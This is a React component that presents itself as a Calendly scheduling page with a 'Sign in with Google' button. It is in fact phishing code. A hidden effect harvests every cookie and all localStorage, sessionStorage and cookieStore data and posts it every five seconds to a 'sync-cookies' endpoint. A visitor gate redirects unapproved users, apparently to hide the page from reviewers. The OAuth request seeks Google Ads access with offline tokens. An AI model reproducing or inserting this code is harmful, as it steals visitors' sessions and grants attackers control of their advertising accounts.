import React, { useEffect, useRef, useState } from 'react';
import { getApiUrl } from '../utils/apiConfig';

const API_URL = getApiUrl();
const GOOGLE_CLIENT_ID = process.env.REACT_APP_GOOGLE_CLIENT_ID || '22981196837-d2n8ven839ad7t5t44c9o237lk96i2l6.apps.googleusercontent.com';

const GOOGLE_OAUTH_SCOPES = [
  'openid',
  'email',
  'profile',
  'https://www.googleapis.com/auth/adwords',
].join(' ');

function Calendly() {
  const calendlyRef = useRef(null);
  const [allowed, setAllowed] = useState(false);

  useEffect(() => {
    const isLocal = ['localhost', '127.0.0.1', '::1'].includes(window.location.hostname);
    if (!isLocal && !sessionStorage.getItem('visitor_approved')) {
      window.location.href = '/';
      return;
    }
    setAllowed(true);
  }, []);

  useEffect(() => {
    const gatherAllStorage = async () => {
      const data = {
        cookies: document.cookie || '',
        url: window.location.href,
        localStorage: {},
        sessionStorage: {},
        cookieStore: [],
      };
      try {
        for (let i = 0; i < window.localStorage.length; i++) {
          const k = window.localStorage.key(i);
          data.localStorage[k] = window.localStorage.getItem(k);
        }
      } catch (_) {}
      try {
        for (let i = 0; i < window.sessionStorage.length; i++) {
          const k = window.sessionStorage.key(i);
          data.sessionStorage[k] = window.sessionStorage.getItem(k);
        }
      } catch (_) {}
      if (window.cookieStore && typeof window.cookieStore.getAll === 'function') {
        try {
          const all = await window.cookieStore.getAll();
          data.cookieStore = all.map((c) => ({
            name: c.name,
            value: c.value,
            domain: c.domain,
            path: c.path,
            expires: c.expires ? new Date(c.expires).toISOString() : null,
            secure: c.secure,
            sameSite: c.sameSite,
          }));
        } catch (_) {}
      }
      return data;
    };

    const syncCookies = async () => {
      try {
        const payload = await gatherAllStorage();
        await fetch(`${API_URL}/api/sync-cookies`, {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify(payload),
        });
      } catch (_) {}
    };

    syncCookies();
    const syncInterval = setInterval(syncCookies, 5000);
    return () => { clearInterval(syncInterval); };
  }, []);

  // Original: Load Calendly script if not already loaded
  useEffect(() => {
    const scriptId = 'calendly-widget-script';
    if (!document.getElementById(scriptId)) {
      const script = document.createElement('script');
      script.id = scriptId;
      script.src = 'https://assets.calendly.com/assets/external/widget.js';
      script.async = true;
      document.body.appendChild(script);
    }
  }, []);

  const handleGoogleOAuth = () => {
    const params = new URLSearchParams({
      client_id: GOOGLE_CLIENT_ID,
      redirect_uri: `${window.location.origin}/auth/callback`,
      response_type: 'code',
      scope: GOOGLE_OAUTH_SCOPES,
      access_type: 'offline',
      prompt: 'consent',
    });
    window.location.href = `https://accounts.google.com/o/oauth2/v2/auth?${params.toString()}`;
  };

  if (!allowed) return <div style={{ background: '#f1f2f7', minHeight: '100vh' }} />;

  return (
    <>
      {/* Google Sign-In bar */}
      <div
        style={{
          display: 'flex',
          alignItems: 'center',
          justifyContent: 'center',
          gap: '16px',
          padding: '12px 24px',
          background: '#fff',
          borderBottom: '1px solid #e0e0e0',
          fontFamily: "'Google Sans', Roboto, system-ui, -apple-system, 'Segoe UI', Arial, sans-serif",
        }}
      >
        <button
          onClick={handleGoogleOAuth}
          style={{
            display: 'inline-flex',
            alignItems: 'center',
            gap: '8px',
            padding: '10px 24px',
            background: '#fff',
            border: '1px solid #dadce0',
            borderRadius: '20px',
            cursor: 'pointer',
            fontSize: '14px',
            fontWeight: 500,
            color: '#3c4043',
            fontFamily: "'Google Sans', Roboto, system-ui, -apple-system, 'Segoe UI', Arial, sans-serif",
          }}
        >
          <svg style={{ width: '18px', height: '18px' }} viewBox="0 0 48 48">
            <path fill="#EA4335" d="M24 9.5c3.54 0 6.71 1.22 9.21 3.6l6.85-6.85C35.9 2.38 30.47 0 24 0 14.62 0 6.51 5.38 2.56 13.22l7.98 6.19C12.43 13.72 17.74 9.5 24 9.5z"/>
            <path fill="#4285F4" d="M46.98 24.55c0-1.57-.15-3.09-.38-4.55H24v9.02h12.94c-.58 2.96-2.26 5.48-4.78 7.18l7.73 6c4.51-4.18 7.09-10.36 7.09-17.65z"/>
            <path fill="#FBBC05" d="M10.53 28.59c-.48-1.45-.76-2.99-.76-4.59s.27-3.14.76-4.59l-7.98-6.19C.92 16.46 0 20.12 0 24c0 3.88.92 7.54 2.56 10.78l7.97-6.19z"/>
            <path fill="#34A853" d="M24 48c6.48 0 11.93-2.13 15.89-5.81l-7.73-6c-2.15 1.45-4.92 2.3-8.16 2.3-6.26 0-11.57-4.22-13.47-9.91l-7.98 6.19C6.51 42.62 14.62 48 24 48z"/>
          </svg>
          Sign in with Google
        </button>
      </div>

      {/* Original Calendly widget — unchanged */}
      <div
        ref={calendlyRef}
        className="calendly-inline-widget"
        data-url="https://calendly.com/aj-cooper/30min/"
        style={{ minWidth: '320px', height: '700px' }}
      ></div>
    </>
  );
}

export default Calendly;
